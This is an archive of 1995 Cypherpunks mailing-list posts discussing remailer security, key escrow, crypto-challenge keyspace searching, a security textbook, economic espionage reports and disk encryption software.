From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Wed, 30 Aug 95 17:57:06 PDT
To: scmayo@rschp1.anu.edu.au
Subject: Is the book Network Security any good?
Message-ID: <9508310053.AA01365@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone read the book "Network Security Private Communication in a 
PUBLIC World" yet?  It's by Charlie Kaufman, Radia Perlman, and Mike
Speciner, and has a copyright date of this year.

Is it good?  What's the level?

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hroller Mixmaster <hroller@c2.org>
Date: Wed, 30 Aug 95 18:47:02 PDT
To: mix-l@jpunix.com.cypherpunks@toad.com
Subject: Mixmaster Security Issues
Message-ID: <199508310117.SAA20828@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Apart from thwarting traffic analysis attacks, how does the security
of a Mixmaster Type II remailer packet compare to that of a
PGP-chained Type I message?

For example, is each remailer in the path limited to knowing only
the next remailer in the path?  Is there any way for a remailer
(except for the first and last in the chain) to know how many hops
have already occurred or how many remain?  Is there a session key
chosen via an RNG?  If so, how random is the RNG?  Is it seeded from
a pseudo-random source that's at least as secure as measuring
keystroke latencies, as PGP does?

Lance Cottrell's original "remailer essay" which proposed the Type
II concept envisioned, if I'm not mistaken, the use of PGP
technology to do the actual encryptions.  Now it seems that another,
seemingly proprietary, implementation of RSAREF was used, instead.
What was the reason for this change?

Would any security be lost if Type I and II technology were combined
and a PGP-chained Type I packet were initially sent via Mixmaster?
This would would seem to provide the necessary protection against
traffic analysis while bypassing any *POSSIBLE* hidden weaknesses in
Mixmaster.  IOW, if the outer Mixmaster "envelope" were "steamed
open", perhasps based on some hidden weakness in Mixmaster, the
inner, nested PGP envelope(s) would remain intact.

BTW, what volume of message traffic is the Mixmaster network of
remailers currently handling?  Is much cover traffic necessary to
minimize delays while providing enough reordering to thwart traffic
analysis?  (IOW, so a remailer with a reordering pool size of five
messages, and averaging one REAL message a day, wouldn't have to
keep a message for an average of five days before sending it on its
next hop, as a worst-case scenario).

Is my math correct in surmising that chaining a message through five
remailers, each with a reordering pool of five messages, could mean
that the message eventually leaves the chain as one of 5^5 (3125)
possible messages?  (My math is a bit weak, so please feel free to
correct my methodology, if necessary.)  If so, does that work in
reverse?  Could a given output message that finally surfaced in the
clear be narrowed down to one of 3125 Mixmaster input messages
through traffic analysis?  Or would the fact that the attacker
didn't know the exact number of hops utilized significantly increase
the odds against identifying the sender?  What effect, if any, would
increasing the number of available remailers have on traffic
analysis?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Wed, 30 Aug 95 18:13:30 PDT
To: cypherpunks@toad.com
Subject: Ajax
Message-ID: <199508310015.TAA04710@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain



A source for links to the Intelligence Community:

URL: http://www.interport.net/~sagal/ajax.html

----------

                         AJAX
   
      UNITED STATES AND INTERNATIONAL GOVERNMENT
        MILITARY AND INTELLIGENCE AGENCY ACCESS

            
Last update: 16 AUG 95. All accesses verified at time of
inclusion.

Certain locations or sections thereof may be closed to
unauthorized use. Please read access warnings, if any,
and abide by them.
    
_______________________________________________________
   
United States Government Intelligence and Law Enforcement
Agency Servers

   ATF (Bureau of Alcohol, Tobacco and Firearms)
   BOP (Federal Bureau of Prisons)
   CIA (Central Intelligence Agency)
   COPNET
   FBI (Federal Bureau of Investigation)
   FINCEN (Federal Crimes Enforcement Network)
   FLETC (Federal Law Enforcement Training Center)
   HEROES (U.S. Department of State Diplomatic Security
      Service Counter-Terrorism Rewards Program)
   MARSHALS (U.S. Marshals Service)
   NLETC (National Law Enforcement Technology Center)
   SS (Secret Service)


United States Military Branch Servers

   NATGUARD (Army and Air National Guards)
   USA (United States Army)
   USAF (United States Air Force)
   USCG (United States Coast Guard)
   USMC (United States Marine Corps)
   USN (United States Navy)
   
          
United States Military & Defense Agency Servers

   ACC (Air Combat Command)
   AFIN (U.S. Air Force InterNet)
   AFOS1 (1st Security Police Squadron, Langley Air Force
      Base)
   CHIEFS (Joint Chiefs of Staff)
   DEFENSE (Defense Department)
   DISA (Defense Information Systems Agency)
   DRMS (Defense Reutilization and Marketing Service)
   NEW (8/16/95)
   DTIC (Defense Technical Information Center)
   NAVWAN (Naval Aviation Systems Team Wide Area Network)
   NAWCWPNS (Naval Air Warfare Center Weapons Division)
   NCS (National Communications System)
   NSWC (Naval Surface Warfare Center)

          
United States Military & Defense Laboratory Servers

   AHPCRC (Army High Performance Computing Research
      Center)
   ARPA (Advanced Research Projects Agency)
   BMDO (Ballistic Missile Defense Organization Test Data
      Centers)
   LABLINK (U.S. Department of Defense Laboratory System)
   NRL (The Naval Research Laboratory)
   RL (USAF Rome Laboratory for C41 Technology)


International Intelligence and Law Enforcement Agency
Servers

   FORENSICS (The Forensic Web, Canada)
   UKPFW (UK Police and Forensic Web)
   RSB (Home Office Research and Statistics Department,
      UK)
   UNCPCJ (United Nations Crime Prevention & Criminal
      Justice)


NATO and International Military Agency Servers

   DRA (Defence Research Agency, United Kingdom)
   DREO (Defense Research Establishment, Ottawa, Canada)
   NATO (North Atlantic Treaty Organization)
   SACLANT (Supreme Allied Commander, Atlantic)
         
   
United States Regulatory Agency Servers

   EPA (U.S. Environmental Protection Agency)
   FAA (Federal Aviation Administration Technical Center)
   FCC (Federal Communications Commission)
   FTC (Federal Trade Commission)
   NRC (Nuclear Regulatory Commission)
   SEC (Securities and Exchange Commission)


United States Government Agency Servers

   CDC (Centers for Disease Control and Prevention)
   CENSUS (U.S. Department of Commerce Bureau of the
      Census)
   CONGRESS (U.S. House of Representatives)
   CUSTOMS (U.S. Customs Service)
   DHHS (U.S. Department of Health and Human Services)
   DOE (U.S. Department of Energy National Laboratories
      & Programs)
   DOSFAN (Department of State Foreign Affairs Network)
   EXECUTIVE (The White House)
   FDIC (Federal Deposit Insurance Corporation)
   FEMA (Federal Emergency Management Agency)
   GPO (U.S. Government Printing Office)
   GSA (U.S. General Services Administration)
   HPCC (NOAA High Performance Computing and
      Communications)
   IRS (Internal Revenue Service)
   JUSTICE (Justice Department)
   NARA (National Archives and Records Administration)
   NASA (National Aeronautics and Space Administration)
   NIMH (National Institute of Mental Health)
   NOAA (National Oceanic & Atmospheric Administration)
   NSF (National Science Foundation)
   NTIS (National Technical Information Service)
   SBA (Small Business Administration)
   NEW (8/16/95)      
   SEL (Space Environment Laboratory)
   TREASURY (Treasury Department)
   USCODE (U.S. House of Representatives Internet Law
      Library U.S. Code)

_______________________________________________________

   AJAX maintained and monitored by Sagal Computer
   Systems.

   E-Mail suggestions, additions, comments or corrections
   to sagal@interport.net












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 30 Aug 95 19:55:00 PDT
To: cypherpunks@toad.com
Subject: Re: NIST Key Escrow meeting
Message-ID: <v02120d05ac6ae2d07614@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:51 8/30/95, Flame Remailer wrote:
>Subject: NIST Key Escrow Meeting Discussion Papers
>
>Key Escrow Issues Meeting, September 6-7, 1995
>Discussion Paper #1

[Old and new GAK requirenments elided]
>With your input, we are hopeful that this effort will lead to
>definitive criteria, which will facilitate the development of
>exportable products and help minimize the time required to obtain
>export licenses.  The Administration seeks to finalize such
>criteria and make formal conforming modifications to the export
>regulations before the end of 1995.
>
>
>Note:  These issues will be discussed at the Key Escrow Issues
>Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at
>the National Institute of Standards and Technology (Gaithersburg,
>Maryland).  The meeting will be open to the public, although
>seating is limited.  Advance registration is requested, please
>contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-
>mail: carlton@micf.nist.gov.

Will any Cypherpunks attend this meeting? I sure hope we get to make our
ideas know.

-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: alano@teleport.com (Alan Olsen) (by way of Alan Olsen <alano@teleport.com>)
Date: Wed, 30 Aug 95 20:54:13 PDT
To: cypherpunks@toad.com
Subject: [comp.security.unix] Advice on password security guidelines
Message-ID: <199508310353.UAA29997@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


I found this on alt.humor.best-of.usenet.  It seemed like something that
would be appreciated here.  (And it is not that far off topic.)

Enjoy!

-----------------------------------------------------------

In alt.humor.best-of-usenet, Artur Pioro <artur@thp2.if.uj.edu.pl>
wrote:

>From: Paul Ashton <paul@argo.demon.co.uk>
>Newsgroups: comp.security.unix
>Subject: Advice on password security guidelines

>Hi,
>my boss has asked me for comments and improvements on his new password
>security policy. To me, it seems a bit severe. If anyone can offer any
>additional suggestions please do, here goes...

>For immediate issue:
>Password changing guidelines V2.2b

>Due to new security policies, the following guidelines have
>been issued to assist in choosing new passwords. Please follow
>them closely.

>Passwords must conform to at least 21 of the following attributes.

>1.  Minimum length 8 characters
>2.  Not in any dictionary.
>3.  No word or phrase bearing any connection to the holder.
>4.  Containing no characters in the ASCII character set.
>5.  No characters typeable on a Sun type 5 keyboard
>6.  No subset of one character or more must have appeared on
>    Usenet news, /dev/mem, rand(3), or the King James bible (version 0.1alpha)
>7.  Must be quantum theoretically secure, i.e. must automatically change
>    if observed (to protect against net sniffing).
>8.  Binary representation must not contain any of the sequences 00 01 10 11,
>    commonly known about in hacker circles.
>9.  Be provably different from all other passwords on the internet.
>10. Not be representable in any human language or written script.
>11. Colour passwords must use a minimum 32 bit pallette.
>12. Changed prior to every use.
>13. Resistant to revelation under threat of physical violence.
>14. Contain tissue samples of at least 3 vital organs.
>15. Incontravertible by OJ Simpsons lawyers.
>16. Undecodable by virtue of application of 0 way hash function.
>17. Odourless, silent, invisible, tasteless, weightless, shapeless, lacking
>    form and inert.
>18. Contain non-linear random S-boxes (without a backdoor).
>19. Self-escrowable to enable authorities to capture kiddie-porn people
>    and baddies but not the goodies ("but we'll only decode it with a
>    court order, honest").
>20. Not decryptable by exhaustive application of possible one time pads.

>Due to the severity of the restrictions, if the password is entered
>incorrectly 3 times at login time, you will be asked if you would like to
>pick a new one.

>Please add guidelines to the above and adjust the minimum conformation
>requirement, if applicable.

>--
>Moderators accept or reject articles based solely on the criteria posted
>in the Frequently Asked Questions. Article content is the responsibility
>of the submittor.  Submit articles to ahbou-sub@acpub.duke.edu. To write 
>to the moderators, send mail to ahbou-mod@acpub.duke.edu. 



|         Spam is the Devil's toothpaste!         | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - Black Art | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Thu, 31 Aug 95 01:47:27 PDT
To: CYPHERPUNKS@toad.com
Subject: Poisson numbers for random keyspace assignment
Message-ID: <8B0251E.00030003C4.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


                  [Great statistical summary deleted]

TC> * For opportunistic attacks on keys in challenges, the odds are 95% that a
TC> key will be found with only twice the total effort (or time) using a
TC> totally random method of picking up keyspace to search.

  The odds can be improved somewhat by scaling the granularity of the
sweep to the size of the sweep. (Align larger chunks on large-chunk
boundaries, eliminating the chance of overlap with other large chunks.)

TC> * This is probably good enough. (And if one only wants to be 90% sure of
TC> finding the key, even less effort is needed.)

  The best advantage of the random method is that it allows people to
participate completely anonymously, as there is nothing to report save
the Eureka!, and that can be done through a remailer anyway. When the
challenge is solved, everyone can stop cracking.

       It is one thing to work on an academic exercise, but the =real=
     test is how well the resources could actually be marshalled for a
     =real= attack. The requirement of leaving an audit trail to
     participate reduces the supply of volunteers. This approach can not
     be challenged as unrealistic.

  The whole thing can be managed via Imail, which I must point out to
you Totally Connected People, is the least-common denominator for
participation here. You have =lots= of people out here who would like to
join the Cypherpunks Brute Squad (We gotta get T-shirts for this one!)
but don't have WWW access.




 * John was a complete D**k, until Lorena got through with him.
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Wed, 30 Aug 95 22:11:06 PDT
To: cypherpunks@toad.com
Subject: Economic Espionage?
Message-ID: <ac6a9205000210049586@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:25 AM 8/31/95, Tatu Ylonen wrote:
>> >It was said that Pres. Clinton had given a speech while
>> >visiting the  CIA HQ in Langley/Virginia. He allegedly
>> >said in this speech that obtaining  industrial
>> >informations has the highest priority and this were the
>> >new  task for the spies.
>
>There was a fairly large article about this in Helsingin Sanomat, the
>largest newspaper in Finland, some weeks ago.  It was quoted as being
>originally from the New York Times.  (I have the clip saved at home
>and can check the date if anyone is interested.)
>
>I do find it rather shocking that the most powerful country in the
>world sets industrial espionage as the primary task of their
>intelligence services.

What confirmation can you give us for this statement?

I'd like to see the actual comments, not just second-hand reports.

The issue of economic surveillance has come up several times, and I know of
no formal policy to institute such a program. The U.S., with generally
multiple competitors in each market, would have a hard time figuring out
who to tell "foreign secrets" to. Would Ford be told? Or just General
Motors? What about companies with operations in multiple countries?

Former DIRNSA (Director of the NSA) William Odom has said repeatedly that
economic espionage cannot plausibly be a central task of the NSA.

Before anyone accuses me of being an apologist for the NSA (usually these
claims arrive anonymously), I've been looking for evidence of an economic
intelligence role or mission of the U.S. intelligence agencies for more
than 7 years.

Let's see some evidence.

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sam Quigley <poodge@econ.Berkeley.EDU>
Date: Wed, 30 Aug 95 22:23:09 PDT
To: cypherpunks@toad.com
Subject: yabc
Message-ID: <199508310523.WAA21036@quesnay.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


Hi.

I'm writing a replacement for brloop/brclient in perl, one with full
SKSP compatibiliy, and one which is easily extensible and more
straightforward than the original br* code...

What would be some useful features to include in the code?  I'm
attempting to make it more friendly, more "intelligent", etc -- the
whole shebang.  It would be reasonably easy to, as someone here
suggested, have the program start the keyfetch process before the last
key segment finished, or whatever -- the question is, is that worth
it?  I'm also including code to make it possible for the user to
specify how much time she wants to give the search, etc...  It should
be possible to include code for a very simple sort of farming setup
(at least something to allow easy remote launches of the brute code)..

Would all this be useful to other people?  What features would make it
more so?

Also, it seems that there have been some "extensions" to the SKSP
protocol...  For instance, suddenly there are different machines
dedicated just to ACKs, etc.  Is there a central repository of these
changes?  (Have these changes even been publicly reviewed?)

(the program, in case you couldn't deduce it from the title of this
message is to be "yabc" - yet another brute* client.  oh how so clever
and original, no?)

- -sq

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMEVHLlIP+Y8TPTdtAQHUowQAxVPVlw9WCw8wzSib8HgEitikLs459/rv
zfuSV60L/7eyePb3ah/xVDWvsub/3Alru7PfgmdSssaZe3RX1Ory0xbLXoB8lXTw
2KeGb18ogRkL/2ALfA85rgAycQ6NxY4o+u/oQxY0WVlukWU+WG71bXjVRyh+YEDd
AEKBnx6/uO8=
=TK/a
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 30 Aug 95 19:54:59 PDT
To: cypherpunks@toad.com
Subject: Re: Is the book Network Security any good?
In-Reply-To: <9508310053.AA01365@cantina.verity.com>
Message-ID: <9508310253.AA09578@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>Has anyone read the book "Network Security Private Communication in a 
>PUBLIC World" yet?  It's by Charlie Kaufman, Radia Perlman, and Mike
>Speciner, and has a copyright date of this year.

Its pretty good on security and structure of protocols. Makes a good companion to 
the Schneier book. I use it frequently.

It does have some very irritating assertions concerning ASN.1 however, 
specifically concerning its use in Kerberos. I consider Kerberos's use of ASN.1 
to be far superior than the alternative suggested which is pure lossage. 
Lambasting the use of ASN.1 is fair game but arguments over wasted bytes miss the 
point of ASN.1 and the BER encoding entirely.

It would make a usefull course book. 

	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 30 Aug 95 20:08:12 PDT
To: Hadmut Danisch <danisch@ira.uka.de>
Subject: Re: CIA & Espionage
In-Reply-To: <9508302127.AA00492@elysion.iaks.ira.uka.de>
Message-ID: <Pine.SUN.3.91.950830230618.22183B-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 30 Aug 1995, Hadmut Danisch wrote:

> Date: Wed, 30 Aug 1995 23:27:23 +0200
> From: Hadmut Danisch <danisch@ira.uka.de>
> To: cypherpunks@toad.com
> Subject: Re: CIA & Espionage
> 
> 
> > because of the source of confirmation, but because it fits right into the 
> > direction most of the intelligence agencies have been taking since the 
> > revelation that the French had won out a multi-billion $ contract for air 
> > traffic control because the French service had, through various espionage 
> > methods, determined the U.S. bidding position and such.
> 
> We have a similar story in Germany. Some time ago, an asian country
> (South Korea if I remember well) was looking for a high speed
> passenger train. They had to choose between the german ICE and the
> french TGV. Both trains  have nearly the same quality from technical
> point of view. Korea decided to take the cheaper one. 
> 
> The germans gave an offer and just half an hour later the french gave
> an offer slightly (just a little bit) cheaper than the germans. France
> got the order (over 10^9 D-Mark). The german headquarter had
> instructed their asian office to give the offer with a certain price
> through unprotected fax. It is said that the fax was wiretapped by the
> french secret service (allegedly)...

The french are particularly nortorious for this.

> 
> Hadmut
> 

Question:  How many pounds of explosive were put in the Citreon which 
leveled the embassy in a massive explosion?

Answer: Zero.


00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Wed, 30 Aug 95 20:13:07 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: NIST Key Escrow meeting
In-Reply-To: <v02120d05ac6ae2d07614@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.950830231153.22183C-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 30 Aug 1995, Lucky Green wrote:

> Date: Wed, 30 Aug 1995 19:58:52 -0800
> From: Lucky Green <shamrock@netcom.com>
> To: cypherpunks@toad.com
> Subject: Re: NIST Key Escrow meeting
> 
> At 7:51 8/30/95, Flame Remailer wrote:
> >Subject: NIST Key Escrow Meeting Discussion Papers
> >
> >Key Escrow Issues Meeting, September 6-7, 1995
> >Discussion Paper #1
> 
> [Old and new GAK requirenments elided]
> >With your input, we are hopeful that this effort will lead to
> >definitive criteria, which will facilitate the development of
> >exportable products and help minimize the time required to obtain
> >export licenses.  The Administration seeks to finalize such
> >criteria and make formal conforming modifications to the export
> >regulations before the end of 1995.
> >
> >
> >Note:  These issues will be discussed at the Key Escrow Issues
> >Meeting to be held September 6-7, 1995 (9:00 a.m. - 5:00 p.m.) at
> >the National Institute of Standards and Technology (Gaithersburg,
> >Maryland).  The meeting will be open to the public, although
> >seating is limited.  Advance registration is requested, please
> >contact Arlene Carlton on 301/975-3240, fax: 301/948-1784 or e-
> >mail: carlton@micf.nist.gov.
> 
> Will any Cypherpunks attend this meeting? I sure hope we get to make our
> ideas know.

I will attempt to attend, but I will not be speaking, sorry.

At the least, if I can make it, I will try to post a summary.

> 
> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.
> 
> 
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Wed, 30 Aug 95 14:27:59 PDT
To: cypherpunks@toad.com
Subject: Re: CIA & Espionage
Message-ID: <9508302127.AA00492@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



> because of the source of confirmation, but because it fits right into the 
> direction most of the intelligence agencies have been taking since the 
> revelation that the French had won out a multi-billion $ contract for air 
> traffic control because the French service had, through various espionage 
> methods, determined the U.S. bidding position and such.

We have a similar story in Germany. Some time ago, an asian country
(South Korea if I remember well) was looking for a high speed
passenger train. They had to choose between the german ICE and the
french TGV. Both trains  have nearly the same quality from technical
point of view. Korea decided to take the cheaper one. 

The germans gave an offer and just half an hour later the french gave
an offer slightly (just a little bit) cheaper than the germans. France
got the order (over 10^9 D-Mark). The german headquarter had
instructed their asian office to give the offer with a certain price
through unprotected fax. It is said that the fax was wiretapped by the
french secret service (allegedly)...

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Wed, 30 Aug 95 20:33:58 PDT
To: owner-cypherpunks@toad.com
Subject: Re: Is the book Network Security any good?
Message-ID: <9508310333.AA12779@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>It does have some very irritating assertions concerning ASN.1 however, 
>specifically concerning its use in Kerberos. I consider Kerberos's use of ASN.1 
>to be far superior than the alternative suggested which is pure lossage. 

What was the alternative suggestion? Many KRB5 folks, including Ted T'so,
have said that using ASN.1 is the biggest mistake in the KRB5 protocol.

>Lambasting the use of ASN.1 is fair game but arguments over wasted bytes miss the 
>point of ASN.1 and the BER encoding entirely.

Hunh?  The points of ASN.1 and BER (DER? -- a little mavros joke :) 
*are* irrelevent to Kerberos.  Wasted bytes in your security protocol
should most definitely be a concern.

Charlie and Radia are hot-shits; I don't know the other guy.
	/r$




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Ingle <inglem@adnetsol.com>
Date: Wed, 30 Aug 95 23:41:49 PDT
To: cypherpunks@toad.com
Subject: RSA Secure (disk encryption)
Message-ID: <199508310641.XAA00285@cryptical.adnetsol.com>
MIME-Version: 1.0
Content-Type: text/plain


RSA's home page (http://www.rsa.com) has a demo version of RSA Secure.
This is a disk/directory encryption program that serves the same
purpose as Secure Drive and SFS. According to their description, it
allows you to select only certain files to be encrypted, and uses
80-bit RC4. The demo/export version is only 40 bits.

It also has optional key escrow. You can choose to escrow a key by
secret-sharing it and giving pieces to various people. There is a
threshold system so m of n people have to cooperate to decrypt it.

						Mike



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Wed, 30 Aug 95 20:46:16 PDT
To: cypherpunks@toad.com
Subject: Re: Mixmaster Security Issues
In-Reply-To: <199508310117.SAA20828@infinity.c2.org>
Message-ID: <m0so0Zi-000H93C@ns.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Wed, 30 Aug 1995 18:17:02 -0700

Can't answer all of your questions, but I'll answer the ones I can,
which will save time for someone else to answer the rest of them.

   Apart from thwarting traffic analysis attacks, how does the security
   of a Mixmaster Type II remailer packet compare to that of a
   PGP-chained Type I message?

Well, on the one hand, PGP uses IDEA, which is arguably better than
triple-DES, but PGP also only uses the key length(s) of choice, which
is to say that if you use the minimum length, you have very little
security.  Also, Mixmaster packets remain the same length from hop to
hop, so they are harder to track.

Not every PGP remailer reorders.

   For example, is each remailer in the path limited to knowing only
   the next remailer in the path?

And the previous one.  For PGP-chaining, that tells you a lot, because
you can observe the message length getting smaller.

   Is there any way for a remailer (except for the first and last in
   the chain) to know how many hops have already occurred or how many
   remain?

No.  The hop list is a constant length, and the list is back-encrypted
through the chain, so that all you can ever know is the next hop,
which the previous remailer couldn't know because it couldn't decrypt
it.

And not even the first or last necessarily!  Both the source and
destination are running Mixmaster (by definition).  There's no reason
why mixmaster must remail -- eventually it delivers.  And someone
sourced the mail using Mixmaster.  If the source or destination is not
on an advertised remailer, or the destination was non-local to the
destination remailerthen it's pretty obvious that someone on that host
is an endpoint.  But that's one of the beauties of Mixmaster --
there's a large security increase in setting it up as a remailer and
advertising it.

   Would any security be lost if Type I and II technology were combined
   and a PGP-chained Type I packet were initially sent via Mixmaster?

Security is increased.

   Is my math correct in surmising that chaining a message through five
   remailers, each with a reordering pool of five messages, could mean
   that the message eventually leaves the chain as one of 5^5 (3125)
   possible messages?

You're ignoring the case where it is to/from a machine that runs a
public remailer.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/~nelson
Crynwr Software   | Crynwr Software sells packet driver support | PGP ok
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | America neither a Christian,
Potsdam, NY 13676 |  Jewish, Islamic, nor atheist (etc&) nation.  This is good.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Thu, 31 Aug 95 01:47:25 PDT
To: CYPHERPUNKS@toad.com
Subject: O.J. ObCrypto:  Fuhrman's Folly Fans Fakery Fears...
Message-ID: <8B02596.00030003C5.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain



  Regardless of whether Ito allows the tapes into evidence, the public
has heard a LEO matter-of-factly discussing the fabrication of evidence
against US citizens. We should take advantage of this, by connecting the
Fuhrman/Good Ole Boys from BFART bit, and GACK.

  If my private key must be escrowed with Lawn Forcement Agencies, the
very real possibility exists of a Fuhrman using it to forge evidence
against me. In =any= Key Escrow arrangement (including the non-
government variety preferred by 4 out of 5 Cypherpunks in a recent
survey) there must be a division between encryption keys and signature
keys.

  I recommend that anyone who will be using escrowed keys generate two
pairs: First, the signature key, including in the userid some kind of
[sig use] identifier (we should settle on a standard abbreviation for
this) follower by the encryption key. This way, when a person gets your
pubkeys, they get the encryption key =last=, which gets it searched
first whenever they PGP -e... something.

  Whatever arrangements are made for escrowing my encryption key,
=nobody= gets my signature key. If I am fired, quit, become brain
damaged or dead, my key can never be used by anyone to implicate me in
any criminal activity.



  Please don't mention to anyone the fact that my signature key can be
used to send me something that even the escrow agents can't read....






 *  
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@obscura.com (Lance Cottrell)
Date: Thu, 31 Aug 95 01:14:28 PDT
To: cypherpunks@toad.com
Subject: Re: Mixmaster Security Issues
Message-ID: <ac6b18ea00021004679f@[137.110.24.250]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 6:17 PM 8/30/95, hroller Mixmaster wrote:
>Apart from thwarting traffic analysis attacks, how does the security
>of a Mixmaster Type II remailer packet compare to that of a
>PGP-chained Type I message?
>

There is no way in which the security of Mixmaster messages is LESS than
that of type I (cypherpunk) remailers. 

>For example, is each remailer in the path limited to knowing only
>the next remailer in the path?  Is there any way for a remailer
>(except for the first and last in the chain) to know how many hops
>have already occurred or how many remain?  Is there a session key
>chosen via an RNG?  If so, how random is the RNG?  Is it seeded from
>a pseudo-random source that's at least as secure as measuring
>keystroke latencies, as PGP does?

Yes, each remailer is limited to knowing the previous and next
destinations. 

A Mixmaster remailer can only tell if it is first, last, or somewhere in
the middle. No information is leaked about position in the chain. There is
a hard limit of 20 hops. 


>Lance Cottrell's original "remailer essay" which proposed the Type
>II concept envisioned, if I'm not mistaken, the use of PGP
>technology to do the actual encryptions.  Now it seems that another,
>seemingly proprietary, implementation of RSAREF was used, instead.
>What was the reason for this change?

Version 1.0 (which was released but not widely used or promoted) used
PGPTools by Pr0duct Cypher. This is a library which provides hooks for most
of the major PGP routines. The main problem with PGPTools is that I could
not get it to compile on anything but a SUN. The other problem was that it
was difficult to control the encryption so I could avoid any change in the
size of information when it was encrypted. RSAREF is very portable, robust,
supported, easy to work with, and was easy to use for fine control of the
encryption process. RSAREF is also much less of a black box to me. I can
understand what it is doing in detail. 

>
>Would any security be lost if Type I and II technology were combined
>and a PGP-chained Type I packet were initially sent via Mixmaster?
>This would would seem to provide the necessary protection against
>traffic analysis while bypassing any *POSSIBLE* hidden weaknesses in
>Mixmaster.  IOW, if the outer Mixmaster "envelope" were "steamed
>open", perhasps based on some hidden weakness in Mixmaster, the
>inner, nested PGP envelope(s) would remain intact.
>

Because of the message size limitations there are some advantages to
sending the mixmaster chain through some type 1 remailers first, rather
than sending a type 1 message in a Mixmaster packet.

>BTW, what volume of message traffic is the Mixmaster network of
>remailers currently handling?  Is much cover traffic necessary to
>minimize delays while providing enough reordering to thwart traffic
>analysis?  (IOW, so a remailer with a reordering pool size of five
>messages, and averaging one REAL message a day, wouldn't have to
>keep a message for an average of five days before sending it on its
>next hop, as a worst-case scenario).
>

It is very difficult to know what fraction of the traffic I see is cover. I
generate some cover traffic my self, and I know some others do as well.
Right now a reordering pool of 5 messages results in a latency of about 30
min. Mixmaster is no longer a small fraction of the remailer market. A
majority of all public remailers support Mixmaster. 

